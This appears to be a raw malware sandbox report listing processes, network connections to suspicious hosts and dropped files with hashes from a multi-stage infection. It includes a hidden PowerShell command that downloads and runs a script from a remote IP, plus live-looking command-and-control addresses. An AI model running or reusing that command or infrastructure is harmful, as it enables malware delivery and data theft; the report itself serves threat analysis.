"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27412 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd3dbb1d-fba4-42f0-a972-06926ad8d09b} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2416 -prefsLen 28332 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e1825d3-0f3d-4642-adca-711fb662a830} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3328 -childID 1 -isForBrowser -prefsHandle 3300 -prefMapHandle 3296 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1228 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a4f4dc1-beea-4d53-b9ff-3564a14c4620} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -childID 2 -isForBrowser -prefsHandle 4104 -prefMapHandle 4100 -prefsLen 32822 -prefMapSize 244628 -jsInitHandle 1228 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29316ab7-3354-435b-b83f-82717f80c4f1} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4852 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4836 -prefMapHandle 4784 -prefsLen 32856 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {883a1b2d-2ce0-42ed-9a50-743c2a388557} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5020 -childID 3 -isForBrowser -prefsHandle 5092 -prefMapHandle 5088 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1228 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca01698-c986-4955-8f97-0c32923e0c37} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 4 -isForBrowser -prefsHandle 3940 -prefMapHandle 5208 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1228 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c58e0af-0900-4810-9148-3ba397fe7873} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5092 -childID 5 -isForBrowser -prefsHandle 5484 -prefMapHandle 5488 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1228 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa611cdd-7e89-47e9-89a3-a3dbb13a571c} 4100 "\\.\pipe\gecko-crash-server-pipe.4100" tab

C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe

"C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5728 -ip 5728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 788

C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2356 -ip 2356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 808

C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10108860101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1F5.tmp\1F6.tmp\1F7.bat C:\Users\Admin\AppData\Local\Temp\10108870101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

Network

Country Destination Domain Proto
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tcp
US 150.171.27.10:443 tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 150.171.27.10:443 g.bing.com tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 91.214.78.34:5556 tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.80.1:443 croprojegies.run tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 104.21.80.1:443 croprojegies.run tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
US 104.21.80.1:443 croprojegies.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
N/A 127.0.0.1:49272 tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.201.110:443 youtube-ui.l.google.com tcp
GB 216.58.201.110:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:49280 tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 tracnquilforest.life udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
NL 2.18.121.79:80 a19.dscg10.akamai.net tcp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
GB 74.125.168.232:443 r3---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 starrynsightsky.icu udp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 104.21.68.89:443 biochextryhub.bet tcp
US 104.21.68.89:443 biochextryhub.bet tcp
US 104.21.68.89:443 biochextryhub.bet tcp
NL 45.144.212.77:16000 45.144.212.77 tcp

Files

C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta

MD5 5ff46727acadec494bc3947481919d7a
SHA1 ae242a67acba5e4dd23e9b35aa143288805db7a8
SHA256 60983400f01860e5d810b5bb238cbbf5fed605a35cb6cec0f4cf09b1b34bd216
SHA512 466e32a957c25f9b6a92ecab9cb7d35f0f6e630606098d956216ae026012ee33690f08ce9e33c2e8acb7406507003f7219a6a0842c1928c17e549f9d4c047699

memory/4004-2-0x00000000031C0000-0x00000000031F6000-memory.dmp

memory/4004-3-0x0000000005900000-0x0000000005F28000-memory.dmp

memory/4004-4-0x0000000005F30000-0x0000000005F52000-memory.dmp

memory/4004-5-0x0000000006090000-0x00000000060F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cs2frkkt.qkw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4004-6-0x0000000006170000-0x00000000061D6000-memory.dmp

memory/4004-16-0x00000000062E0000-0x0000000006634000-memory.dmp

memory/4004-17-0x0000000006770000-0x000000000678E000-memory.dmp

memory/4004-18-0x00000000068E0000-0x000000000692C000-memory.dmp

memory/4004-19-0x00000000080B0000-0x000000000872A000-memory.dmp

memory/4004-20-0x0000000006CA0000-0x0000000006CBA000-memory.dmp

memory/4004-22-0x0000000007C10000-0x0000000007CA6000-memory.dmp

memory/4004-23-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

memory/4004-24-0x0000000008CE0000-0x0000000009284000-memory.dmp

C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/3316-32-0x0000000000640000-0x0000000000B02000-memory.dmp

memory/3316-47-0x0000000000640000-0x0000000000B02000-memory.dmp

memory/5412-48-0x0000000000C60000-0x0000000001122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

MD5 ff130f0907781b9b0564a2e34350bda9
SHA1 968fd9f8787bda595df9a1670d28e8b129bbea99
SHA256 820ab89ef3e39e2ec7f7322c4710a7fbb1cc01b5cc28043f607f30312119a1b5
SHA512 8e5feb41fcfdf2366c8da4fda8d37eb29defb839689cacfdaf50d03604447e18e9cf83f31d90f7f48fce0ad40add335cf85b0c3b135de396e5971c19fd239e1f

C:\Users\Admin\AppData\Local\Temp\Build.exe

MD5 a94e37aebedaf87a3763e1c7766b5940
SHA1 d9064a5ec1ea7957cdde14a26e8b58ec9981fb0a
SHA256 7ee9298b5c6f9e90309c31684e030960cac17d71ca1316a2493843ef35d2cd70
SHA512 a82cf09a3048278b7439aedd6b2a9c5c4b528d42b5650881c88b39bc3cd4d40f995dbec2d8a2b8e1f4fc8e0e041b27f932b36fd67a4da268e5dd9f479517c948

C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs

MD5 3811496e1794473ea967dcd32594ccbb
SHA1 80d98553d718103ce5d52cacd64367d71ba4edd5
SHA256 477a23adf9b2e3b1b595dde107ee8f1a409671491e74b21e5ffdb0062525fc0d
SHA512 9cefbd14f7a3343c164397972d177c32b7ca5f72127c34481d02068ef4c78825cf40208b8e6869535726cdf6852b55b9d89d6850bf42af50c746de494a1185c3

memory/4412-82-0x0000000000420000-0x00000000004B4000-memory.dmp

memory/4412-83-0x0000000004F80000-0x0000000005142000-memory.dmp

memory/4412-84-0x0000000005EC0000-0x00000000063EC000-memory.dmp

memory/5412-90-0x0000000000C60000-0x0000000001122000-memory.dmp

memory/5412-89-0x0000000000C60000-0x0000000001122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\Temp\10108470101\947ced5026.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

C:\Users\Admin\AppData\Local\Temp\FkgEDUTgg.hta

MD5 f22f572414d6a36a88dfe6dadeb1d663
SHA1 ee815e73e643d3e7803b990d5bab8bbdceea7bd6
SHA256 f5982754aaef7ebfeb95570db5b253e6c053de7fbb9f257dc9cc44448cea39a9
SHA512 069c070bdc4f7e2437908f4a9028041e67bf74a3784c33cb655d061576913eb2eb7d2442ae2531e19c7f069857f567a4a5f692d16d64f6011f3f078629f985e8

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/3924-153-0x0000000005C90000-0x0000000005FE4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6e233cf5429b3478ead1fb405a4e172c
SHA1 d161febcca9284afb0ddebd7385d8e1d2a5092e3
SHA256 c22baae5be8aa6d858b0ecd392bb56db9dd7251579be694231320e736109d015
SHA512 4fd4aa2c1b229a9a31dcd82a591552b853dc9145a30c5bc0e9cb01e4c26c8a8ffab57f8d9148fbd1631c80f77a25cf9e12423a0c6c761cee6879ab875ff86851

memory/3924-164-0x0000000006850000-0x000000000689C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/3944-193-0x0000000000830000-0x0000000000CEC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9269f5988c16234aa028a182449b9689
SHA1 b79e911280c8c4645f7992b765672caca04fa279
SHA256 d85790aecbc78cf12e31147581da4d3e14b6c196e95a40a5daeb6b1b903d6308
SHA512 900603b4315b170a39f010903bc16a759a07888d6cc3aa3d9a73c4c7e62fff670d9bc9faabbd6549c3f80f2dd7330b69ade6ca8d5cf522246ee507d83f39a120

memory/3944-198-0x0000000000830000-0x0000000000CEC000-memory.dmp

memory/5412-199-0x0000000000C60000-0x0000000001122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

MD5 19d2fe8a5d6c2174fb2a5c54e98523e0
SHA1 8e0a2cf8cbff8c169cba1e0a3785083ebeb5a627
SHA256 8a12b05f92dbb47d713dbc73cccccb089fc88f6ba96b5a64f42aaf6431e5616e
SHA512 3ff858f79a4e55f6728369b0f0d6de6060dbc4728ab21e5c352c209ef92b203f3039a623118706227ac61f75ab8b68ae4958d7939a000729de0890b54706ca95

memory/1632-227-0x0000019A5E1D0000-0x0000019A5E254000-memory.dmp

memory/1632-239-0x0000019A789A0000-0x0000019A78B62000-memory.dmp

memory/1632-238-0x0000019A78760000-0x0000019A787B0000-memory.dmp

memory/1632-240-0x0000019A78850000-0x0000019A788C6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a4c4f56e4b7d2372c399ce79e0a0abe
SHA1 663cfb18ed5ffec9caa21ad2f98768bb0c6be9f5
SHA256 9f219435e2c13cb18f7dad51aa7c184b5060890185246c310aacb19892500433
SHA512 0eb5519311219bef2630c953093e6834e53d0cccf7d62a13fb22eb52fa8d467abfe774b8b8daa3922e9d9401f5179003b77f45e8e6a3220fd9ddafd72dbac5d6

memory/1632-242-0x0000019A79880000-0x0000019A79DA8000-memory.dmp

memory/1632-243-0x0000019A5E720000-0x0000019A5E732000-memory.dmp

C:\Temp\CvQR3Yfqh.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/1632-246-0x0000019A60020000-0x0000019A6003E000-memory.dmp

memory/5428-256-0x0000000005CE0000-0x0000000006034000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 275ceb7572958dad81b163bed9ab9246
SHA1 f8356c694a6fc521decf7586f5959178c4c6de24
SHA256 5a456fcca95e2fd30841a86b43291edc03664cc275d020874d9320e42221e94d
SHA512 4bb2ff0254e2a7b3374bd845fd09a8d7de5eb40f8350f9cef4acf42893a5e7d8605793318b558636627fb3c9e08124ffaaee7a40fec86dde9d57864601fda2aa

memory/5428-258-0x00000000063B0000-0x00000000063FC000-memory.dmp

memory/692-261-0x0000000000C60000-0x0000000001122000-memory.dmp

memory/692-264-0x0000000000C60000-0x0000000001122000-memory.dmp

memory/4872-273-0x00000000002D0000-0x000000000078C000-memory.dmp

memory/4872-275-0x00000000002D0000-0x000000000078C000-memory.dmp

memory/5412-276-0x0000000000C60000-0x0000000001122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/5408-290-0x0000000000440000-0x0000000000E2D000-memory.dmp

memory/5412-292-0x0000000000C60000-0x0000000001122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108720101\38d8b16662.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/5848-310-0x0000000000450000-0x00000000004C8000-memory.dmp

memory/3356-313-0x0000000000400000-0x0000000000465000-memory.dmp

memory/3356-315-0x0000000000400000-0x0000000000465000-memory.dmp

memory/5408-316-0x0000000000440000-0x0000000000E2D000-memory.dmp

memory/5408-317-0x0000000000440000-0x0000000000E2D000-memory.dmp

